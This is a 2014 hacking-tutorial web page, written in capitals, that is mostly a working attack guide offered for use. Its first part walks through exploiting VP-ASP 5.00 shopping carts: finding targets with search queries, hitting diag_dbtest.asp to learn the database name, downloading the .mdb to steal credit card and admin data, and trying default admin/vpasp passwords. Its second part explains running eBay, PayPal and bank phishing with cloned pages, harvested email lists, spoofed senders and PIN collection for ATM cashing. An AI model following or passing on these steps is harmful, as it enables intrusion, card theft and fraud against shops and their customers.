1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.
Continue Reading
 
A Website by Neeraj
Copyright © 2014. Hacking Crush - All Rights Reserved
Developed by :Neeraj Dhawan
Organized by : Neeraj Dhawan